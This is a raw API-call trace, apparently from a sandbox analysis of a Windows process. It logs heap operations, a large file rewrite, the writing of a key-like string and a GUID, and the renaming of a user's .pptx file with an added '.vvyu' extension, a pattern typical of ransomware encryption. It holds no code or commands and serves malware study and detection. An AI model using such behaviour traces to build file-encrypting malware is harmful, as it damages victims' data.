RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.349] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18420) returned 0x2ea79b0 [0194.350] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f00 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ab0 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ae0 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b28 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b70 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.351] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0194.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b70 [0194.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0194.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ac8 [0194.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2b28 [0194.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0194.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0194.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0194.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0194.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0194.354] GetCurrentThreadId () returned 0x66c [0194.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9fe30 [0194.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0194.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.355] GetCurrentThreadId () returned 0x66c [0194.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac90 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b70 [0194.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b28 [0194.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0194.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ac8 [0194.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b40 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b88 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b58 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ba0 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b10 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b28 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0194.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0194.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0194.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b40 | out: hHeap=0x620000) returned 1 [0194.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0194.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0194.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.366] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x1841d, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x1841d, lpOverlapped=0x0) returned 1 [0194.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.368] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x18422, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.368] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.369] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.370] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.370] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.370] CloseHandle (hObject=0x568) returned 1 [0194.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea3a68 [0194.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.372] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\_dmv92XP.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\_dmv92xp.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\_dmv92XP.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\_dmv92xp.pptx.vvyu")) returned 1 [0194.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.374] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.378] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38d15e90, ftCreationTime.dwHighDateTime=0x1d83a11, ftLastAccessTime.dwLowDateTime=0xa7c7e6b0, ftLastAccessTime.dwHighDateTime=0x1d85993, ftLastWriteTime.dwLowDateTime=0xa7c7e6b0, ftLastWriteTime.dwHighDateTime=0x1d85993, nFileSizeHigh=0x0, nFileSizeLow=0x18422, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dmv92XP.pptx", cAlternateFileName="_DMV92~1.PPT")) returned 0 [0194.378] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0194.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0194.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0194.379] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0194.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0194.379] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0194.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0194.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 